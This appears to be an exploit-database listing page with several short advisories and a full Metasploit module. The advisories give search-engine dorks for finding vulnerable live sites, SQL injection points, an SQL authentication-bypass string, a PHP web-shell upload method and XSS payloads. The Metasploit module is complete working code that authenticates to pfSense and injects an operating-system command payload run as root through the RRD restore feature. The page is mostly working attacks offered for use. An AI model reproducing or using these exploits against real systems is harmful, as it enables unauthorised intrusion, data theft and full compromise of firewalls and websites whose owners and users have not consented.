Latest exploits :: CodePwn

<pre><code>==================================================================================================================================== | # Title : brsisCMS v1.0.2 sql injection Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit) | | # Vendor : http://www.brsis.com.br/ | | # Dork : "Produzido por Brsis" | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine . [+] http://127.0.0.1.jj.ind.br/produtos.php?idlinha=2 <=== inject here [+] http://127.0.0.1/jj.ind.br/extranet/index.php <==== Panel Greetings to :========================================================================================================================= jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr | ======================================================================================================================================= </code></pre>

<pre><code>==================================================================================================================================== | # Title : BrightCube LMS v2.0.1 SQL Injection Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0.3(32-bit) | | # Vendor : http://www.brightcube.ie/ | | # Dork : Developed By Bright Cube | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] http://127.0.0.1/upvc.cem-bdcom/php_files/contents/contents.php?cmd=page&contid=11 <====| inject here [+] http://127.0.0.1/upvc.cem-bdcom/php_files/standard/user_home/user_home.php?home=home_client_login <====| Login Greetings to :========================================================================================================================= jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr | ======================================================================================================================================= </code></pre>

<pre><code>==================================================================================================================================== | # Title : Brigadasoft CMS v2.1 Auth Bypass Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) | | # Vendor : https://aatheshsoft.com | | # Dork : intext:''Designed & Developed by Brigadasoft'' | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine . [+] use payload admin & pass : 1'or'1'='1 [+] http://127.0.0.1/shreenathsteelin/admin/ Greetings to :========================================================================================================================= jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr | ======================================================================================================================================= </code></pre>

<pre><code>==================================================================================================================================== | # Title : boomchat-v3.0 remote shell upload vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit) | | # Vendor : http://adyou.me/svsZ | | # Dork : | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine . [+] register in script 4 chat . [+] change photo of profil . [+] chang evil from 1.php to 1.php.jpg [+] go to http://127.0.0.1/bmchat/avatar/peter85467529.php Greetings to :========================================================================================================================= jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr | ======================================================================================================================================= </code></pre>

<pre><code>====================================================================================================================================== | # Title : BloodBank v1.0 - Blood Donor Directory CMS with PayPal Integration XSS Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit) | | # Vendor : https://codecanyon.net/item/bloodbank-blood-donor-directory-cms-with-paypal-integration/21188267 | | # Dork : n/a | ====================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine . [+] use payload in search box: <script>alert(/indoushka/);</script> [+] http://127.0.0.1/demosly.om/xicia/cc/bloodbank/ Greetings to :========================================================================================================================= jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr | ======================================================================================================================================= </code></pre>

<pre><code>==================================================================================================================================== | # Title : Blogator script v 0.93 XSS Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit) | | # Vendor : http://www.blogator.net/ | | # Dork : Weblogs par Blogator-script www.blogator-script.com © 2006 SAMTEK - Blogator | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine [+] Use Payload : ?msg=Ce%2520pseudo%2520de%2520membre%2520est%2520inconnu%27%22%28%29%26%25%3CScRiPt%20%3Eprompt%28904707%29%3C/ScRiPt%3E [+] http://127.0.0.1//tst/?msg=Ce%2520pseudo%2520de%2520membre%2520est%2520inconnu%27%22%28%29%26%25%3CScRiPt%20%3Eprompt%28904707%29%3C/ScRiPt%3E Greetings to :========================================================================================================================= jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr | ======================================================================================================================================= </code></pre>

<pre><code>==================================================================================================================================== | # Title : Bigware Shop v2.3 XSS Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit) | | # Vendor : http://www.bigware.de/ | | # Dork : | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine [+] Xss /Html inject Use Payload : /main_bigware_39.php?bigPfad=&items_id=67%27%22%28%29%26%25%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3Eindoushka%3C/font%3E%3C/marquee%3E [+] http://target_site/main_bigware_39.php?bigPfad=&items_id=67%27%22%28%29%26%25%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3Eindoushka%3C/font%3E%3C/marquee%3E Greetings to :========================================================================================================================= jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr | ======================================================================================================================================= </code></pre>

<pre><code>==================================================================================================================================== | # Title : Bazaar Social Listing Shopping Web PHP Template v2.3.2 XSS Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(32-bit) | | # Vendor : https://codecanyon.net/item/bazaar-social-listing-shopping-web-php-template/23207913?s_rank=87 | | # Dork : "/ad-info.php?adObjID=" | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] Create New User Account. [+] Edit your account https://127.0.0.1/egyptdrinkscom/settings.php or Sell an item https://127.0.0.1/egyptdrinkscom/sell-edit-stuff.php [+] Put Your Payload xss/hrml . ====Greetings to :===================================================================================================================== jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh | ======================================================================================================================================= </code></pre>

<pre><code>class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager include Msf::Exploit::FileDropper prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'pfSense Restore RRD Data Command Injection', 'Description' => %q{ This module exploits an authenticated command injection vulnerabilty in the "restore_rrddata()" function of pfSense prior to version 2.7.0 which allows an authenticated attacker with the "WebCfg - Diagnostics: Backup & Restore" privilege to execute arbitrary operating system commands as the "root" user. This module has been tested successfully on version 2.6.0-RELEASE. }, 'License' => MSF_LICENSE, 'Author' => [ 'Emir Polat', # vulnerability discovery & metasploit module ], 'References' => [ ['CVE', '2023-27253'], ['URL', 'https://redmine.pfsense.org/issues/13935'], ['URL', 'https://github.com/pfsense/pfsense/commit/ca80d18493f8f91b21933ebd6b714215ae1e5e94'] ], 'DisclosureDate' => '2023-03-18', 'Platform' => ['unix'], 'Arch' => [ ARCH_CMD ], 'Privileged' => true, 'Targets' => [ [ 'Automatic Target', {}] ], 'Payload' => { 'BadChars' => "\x2F\x27", 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'generic netcat' } }, 'DefaultOptions' => { 'RPORT' => 443, 'SSL' => true }, 'DefaultTarget' => 0, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [CONFIG_CHANGES, IOC_IN_LOGS] } ) ) register_options [ OptString.new('USERNAME', [true, 'Username to authenticate with', 'admin']), OptString.new('PASSWORD', [true, 'Password to authenticate with', 'pfsense']) ] end def check unless login return Exploit::CheckCode::Unknown("#{peer} - Could not obtain the login cookies needed to validate the vulnerability!") end res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'diag_backup.php'), 'method' => 'GET', 'keep_cookies' => true ) return Exploit::CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil? return Exploit::CheckCode::Unknown("#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200 unless res&.body&.include?('Diagnostics: ') return Exploit::CheckCode::Safe('Vulnerable module not reachable') end version = detect_version unless version return Exploit::CheckCode::Detected('Unable to get the pfSense version') end unless Rex::Version.new(version) < Rex::Version.new('2.7.0-RELEASE') return Exploit::CheckCode::Safe("Patched pfSense version #{version} detected") end Exploit::CheckCode::Appears("The target appears to be running pfSense version #{version}, which is unpatched!") end def login # Skip the login process if we are already logged in. return true if @logged_in csrf = get_csrf('index.php', 'GET') unless csrf print_error('Could not get the expected CSRF token for index.php when attempting login!') return false end res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'index.php'), 'method' => 'POST', 'vars_post' => { '__csrf_magic' => csrf, 'usernamefld' => datastore['USERNAME'], 'passwordfld' => datastore['PASSWORD'], 'login' => '' }, 'keep_cookies' => true ) if res && res.code == 302 @logged_in = true true else false end end def detect_version res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'index.php'), 'method' => 'GET', 'keep_cookies' => true ) # If the response isn't a 200 ok response or is an empty response, just return nil. unless res && res.code == 200 && res.body return nil end if (%r{Version.+(?<version>[0-9.]+-RELEASE)\n?}m =~ res.body).nil? nil else version end end def get_csrf(uri, methods) res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, uri), 'method' => methods, 'keep_cookies' => true ) unless res && res.body return nil # If no response was returned or an empty response was returned, then return nil. end # Try regex match the response body and save the match into a variable named csrf. if (/var csrfMagicToken = "(?<csrf>sid:[a-z0-9,;:]+)";/ =~ res.body).nil? return nil # No match could be found, so the variable csrf won't be defined. else return csrf end end def drop_config csrf = get_csrf('diag_backup.php', 'GET') unless csrf fail_with(Failure::UnexpectedReply, 'Could not get the expected CSRF token for diag_backup.php when dropping the config!') end post_data = Rex::MIME::Message.new post_data.add_part(csrf, nil, nil, 'form-data; name="__csrf_magic"') post_data.add_part('rrddata', nil, nil, 'form-data; name="backuparea"') post_data.add_part('', nil, nil, 'form-data; name="encrypt_password"') post_data.add_part('', nil, nil, 'form-data; name="encrypt_password_confirm"') post_data.add_part('Download configuration as XML', nil, nil, 'form-data; name="download"') post_data.add_part('', nil, nil, 'form-data; name="restorearea"') post_data.add_part('', 'application/octet-stream', nil, 'form-data; name="conffile"') post_data.add_part('', nil, nil, 'form-data; name="decrypt_password"') res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'diag_backup.php'), 'method' => 'POST', 'ctype' => "multipart/form-data; boundary=#{post_data.bound}", 'data' => post_data.to_s, 'keep_cookies' => true ) if res && res.code == 200 && res.body =~ /<rrddatafile>/ return res.body else return nil end end def exploit unless login fail_with(Failure::NoAccess, 'Could not obtain the login cookies!') end csrf = get_csrf('diag_backup.php', 'GET') unless csrf fail_with(Failure::UnexpectedReply, 'Could not get the expected CSRF token for diag_backup.php when starting exploitation!') end config_data = drop_config if config_data.nil? fail_with(Failure::UnexpectedReply, 'The drop config response was empty!') end if (%r{<filename>(?<file>.*?)</filename>} =~ config_data).nil? fail_with(Failure::UnexpectedReply, 'Could not get the filename from the drop config response!') end config_data.gsub!(' ', '${IFS}') send_p = config_data.gsub(file, "WAN_DHCP-quality.rrd';#{payload.encoded};") post_data = Rex::MIME::Message.new post_data.add_part(csrf, nil, nil, 'form-data; name="__csrf_magic"') post_data.add_part('rrddata', nil, nil, 'form-data; name="backuparea"') post_data.add_part('yes', nil, nil, 'form-data; name="donotbackuprrd"') post_data.add_part('yes', nil, nil, 'form-data; name="backupssh"') post_data.add_part('', nil, nil, 'form-data; name="encrypt_password"') post_data.add_part('', nil, nil, 'form-data; name="encrypt_password_confirm"') post_data.add_part('rrddata', nil, nil, 'form-data; name="restorearea"') post_data.add_part(send_p.to_s, 'text/xml', nil, "form-data; name=\"conffile\"; filename=\"rrddata-config-pfSense.home.arpa-#{rand_text_alphanumeric(14)}.xml\"") post_data.add_part('', nil, nil, 'form-data; name="decrypt_password"') post_data.add_part('Restore Configuration', nil, nil, 'form-data; name="restore"') res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'diag_backup.php'), 'method' => 'POST', 'ctype' => "multipart/form-data; boundary=#{post_data.bound}", 'data' => post_data.to_s, 'keep_cookies' => true ) if res print_error("The response to a successful exploit attempt should be 'nil'. The target responded with an HTTP response code of #{res.code}. Try rerunning the module.") end end end </code></pre>